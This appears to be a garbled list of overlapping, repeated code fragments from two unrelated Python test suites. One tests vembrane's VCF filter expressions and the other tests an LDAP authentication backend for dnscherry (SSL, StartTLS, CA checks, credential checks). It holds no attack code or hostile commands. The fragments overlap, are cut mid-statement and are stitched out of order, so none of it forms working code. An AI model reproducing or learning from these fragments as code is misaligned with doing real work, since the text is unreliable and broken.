"from vembrane import check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly check",
"import os from pysam import VariantFile import pytest import yaml from vembrane import",
"config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception",
"actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), )",
"the filter expression here # until we change from calling filter_vcf # to",
"VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression",
"else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\",",
"here # until we change from calling filter_vcf # to actually invoking vembrane.main",
"test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if",
"invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) )",
"config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): # FIXME",
"with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\"",
"d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with",
"False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"),",
"os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as",
"as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config:",
"check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected",
"import yaml from vembrane import errors from vembrane import __version__, filter_vcf CASES =",
"path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf =",
"until we change from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list(",
"exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): # FIXME we",
"import errors from vembrane import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert",
"__version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\",",
"filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False), ) ) assert result == expected",
"assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not",
"[d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path =",
"open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in",
"import pytest import yaml from vembrane import errors from vembrane import __version__, filter_vcf",
"if \"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with",
"\"raises\" in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception):",
"pysam import VariantFile import pytest import yaml from vembrane import errors from vembrane",
"pathlib import Path import os from pysam import VariantFile import pytest import yaml",
"have to explicitly check the filter expression here # until we change from",
"__version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")]",
"= yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\")) if \"raises\" in config: exception = getattr(errors,",
"from calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"),",
"expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\", False),",
"in config: exception = getattr(errors, config[\"raises\"]) from vembrane import check_filter_expression with pytest.raises(exception): #",
"= CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config = yaml.load(config_fp, Loader=yaml.FullLoader) vcf = VariantFile(path.joinpath(\"test.vcf\"))",
"Path import os from pysam import VariantFile import pytest import yaml from vembrane",
"expression here # until we change from calling filter_vcf # to actually invoking",
"CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for",
"os from pysam import VariantFile import pytest import yaml from vembrane import errors",
"pytest.raises(exception): # FIXME we have to explicitly check the filter expression here #",
"FIXME we have to explicitly check the filter expression here # until we",
"# to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\", \"ANN\"), config.get(\"keep_unmatched\",",
"def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES)",
"\"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def test_filter(testcase): path",
"calling filter_vcf # to actually invoking vembrane.main check_filter_expression(config.get(\"filter_expression\")) list( filter_vcf( vcf, config.get(\"filter_expression\"), config.get(\"ann_key\",",
"import __version__, filter_vcf CASES = Path(__file__).parent.joinpath(\"testcases\") def test_version(): assert __version__ == \"0.1.0\" @pytest.mark.parametrize(",
"if not d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp:",
"\"0.1.0\" @pytest.mark.parametrize( \"testcase\", [d for d in os.listdir(CASES) if not d.startswith(\".\")] ) def",
"import check_filter_expression with pytest.raises(exception): # FIXME we have to explicitly check the filter",
"d.startswith(\".\")] ) def test_filter(testcase): path = CASES.joinpath(testcase) with open(path.joinpath(\"config.yaml\")) as config_fp: config =",
"\"ANN\"), config.get(\"keep_unmatched\", False), ) ) else: expected = list(VariantFile(path.joinpath(\"expected.vcf\"))) result = list( filter_vcf("
] |
[
"inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match",
"'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self):",
"'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 =",
"peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off'",
"Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert']",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect()",
"severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber',",
"'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)',",
"= 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect()",
"True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson',",
"def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell',",
"import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org',",
"cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def",
"inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self):",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldap",
"Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False",
"= inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert']",
"'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv",
"'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl':",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap =",
"testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri']",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log)",
"cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword',",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword)",
"'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def",
"import Auth, CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module':",
"cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) try: ldapc =",
"res == False def testMissingParam(self): cfg2 = {} return True try: inv =",
"ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636'",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log)",
"testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret",
"import sys from sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy()",
"def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy()",
"= 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn,",
"import unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap import",
"'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls':",
"def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv =",
"'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {}",
"CaFileDontExist import cherrypy import logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn':",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self):",
"inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res",
"CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert']",
"= Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e:",
"with_statement from __future__ import unicode_literals import pytest import sys from sets import Set",
"= inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 =",
"= { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password', 'auth.ldap.uri':",
"testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2,",
"e[0]['info'] == 'TLS: hostname does not match CN in peer certificate' def testConnectStartTLS(self):",
"= 'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self):",
"'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN",
"inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] =",
"unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap import Auth,",
"cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def",
"inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'on' inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN",
"def testConnectSSLNoCheck(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv =",
"inv = Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as",
"as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2,",
"testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on'",
"cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log)",
"'password', 'auth.ldap.uri': 'ldap://ldap.dnscherry.org:389', 'auth.ldap.ca': './tests/test_env/etc/dnscherry/TEST-cacert.pem', 'auth.ldap.starttls': 'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)',",
"['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class TestError(object):",
"in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] =",
"e: assert e[0]['info'] == 'TLS: hostname does not match CN in peer certificate'",
"class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2",
"def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] =",
"cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info']",
"inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] =",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e: return def testConnectSSLWrongCA(self): cfg2",
"traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber',",
"inv.bindpassword) return True def testConnectSSL(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] =",
"cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn': 'cn=dnscherry,dc=example,dc=org', 'auth.ldap.bindpassword': 'password',",
"'./test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv",
"'<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res =",
"as e: assert e[0]['info'] == 'TLS: hostname does not match CN in peer",
"= 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn,",
"'(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='',",
"inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res",
"inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'userPassword', 'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return",
"'./test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() except CaFileDontExist as e:",
"sets import Set from dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import",
"'off', 'auth.ldap.checkcert': 'off', 'auth.ldap.user.filter.tmpl': '(uid=%(login)s)', 'auth.ldap.group.filter.tmpl': '(member=%(userdn)s)', 'auth.ldap.dn_user_attr': 'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10,",
"= cfg.copy() cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] =",
"ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on'",
"== True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password') or",
"res = inv.check_credentials('notauser', 'password') or inv.check_credentials('jwatson', '<PASSWORD>') assert res == False def testMissingParam(self):",
"'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc",
"except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not match CN",
"from __future__ import unicode_literals import pytest import sys from sets import Set from",
"hostname does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy()",
"'givenName', 'email', 'sn'] class TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True",
"python # -*- coding: utf-8 -*- from __future__ import with_statement from __future__ import",
"inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return",
"cfg2['uri'] = 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv",
"testConnect(self): inv = Auth(cfg, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) return True def",
"'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc =",
"= cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] =",
"'uid', 'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error",
"testMissingCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt'",
"pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home',",
"= 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"e: return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on'",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert",
"syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error = syslog_error attr = ['shéll', 'shell', 'cn',",
"cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testConnect(self): inv = Auth(cfg, cherrypy.log) ldap",
"= Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e:",
"= inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS:",
"def testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except",
"= 'on' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except",
"Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log)",
"testMissingParam(self): cfg2 = {} return True try: inv = Auth(cfg2, cherrypy.log) except MissingKey:",
"TestError(object): def testNominal(self): inv = Auth(cfg, cherrypy.log) return True def testConnectSSLNoCheck(self): cfg2 =",
"# -*- coding: utf-8 -*- from __future__ import with_statement from __future__ import unicode_literals",
"inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return def testMissingCA(self): cfg2 = cfg.copy()",
"Auth(cfg2, cherrypy.log) try: ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: return",
"ldapc = inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] ==",
"'on' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def testLdapUnavaible(self): cfg2",
"inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv =",
"cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try: inv = Auth(cfg2,",
"cherrypy.log) ldapc = inv._connect() ldapc.simple_bind_s(inv.binddn, inv.bindpassword) def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret",
"ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log) res = inv.check_credentials('notauser', 'password')",
"cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' cfg2['ca'] = './test/cfg/not_a_ca.crt' try:",
"__future__ import unicode_literals import pytest import sys from sets import Set from dnscherry.auth.modLdap",
"__future__ import with_statement from __future__ import unicode_literals import pytest import sys from sets",
"cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv = Auth(cfg2, cherrypy.log) ldapc =",
"ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname does not",
"= ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName', 'email', 'sn'] class",
"'<PASSWORD>') assert res == False def testMissingParam(self): cfg2 = {} return True try:",
"= inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def testAuthFailure(self): inv = Auth(cfg, cherrypy.log)",
"def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv =",
"def testAuthSuccess(self): inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret ==",
"inv._connect() try: ldapc.simple_bind_s(inv.binddn, inv.bindpassword) except ldap.SERVER_DOWN as e: assert e[0]['info'] == 'TLS: hostname",
"return def testConnectSSLWrongCA(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://ldap.dnscherry.org:636' cfg2['checkcert'] = 'on' inv",
"logging import ldap cfg = { 'auth.ldap.module': 'dnscherry.backend.ldap', 'auth.ldap.groupdn': 'ou=groups,dc=example,dc=org', 'auth.ldap.userdn': 'ou=People,dc=example,dc=org', 'auth.ldap.binddn':",
"does not match CN in peer certificate' def testConnectStartTLS(self): cfg2 = cfg.copy() cfg2['uri']",
"= 'ldap://ldap.dnscherry.org:390' cfg2['checkcert'] = 'off' cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv =",
"inv.bindpassword) def testLdapUnavaible(self): cfg2 = cfg.copy() cfg2['uri'] = 'ldaps://notaldap:636' cfg2['checkcert'] = 'on' inv",
"inv = Auth(cfg, cherrypy.log) ret = inv.check_credentials('jwatson', '<PASSWORD>') assert ret == True def",
"cfg2['starttls'] = 'on' cfg2['ca'] = './test/cfg/ca.crt' inv = Auth(cfg2, cherrypy.log) ldapc = inv._connect()",
"#!/usr/bin/env python # -*- coding: utf-8 -*- from __future__ import with_statement from __future__",
"'auth.ldap.group_attr.member': \"%(dn)s\", 'auth.ldap.timeout': 10, } def syslog_error(msg='', context='', severity=logging.INFO, traceback=False): pass cherrypy.log.error =",
"cfg2['checkcert'] = 'off' inv = Auth(cfg2, cherrypy.log) ldap = inv._connect() ldap.simple_bind_s(inv.binddn, inv.bindpassword) def",
"= syslog_error attr = ['shéll', 'shell', 'cn', 'uid', 'uidNumber', 'gidNumber', 'home', 'userPassword', 'givenName',",
"dnscherry.auth.modLdap import Auth, CaFileDontExist import cherrypy import logging import ldap cfg = {",
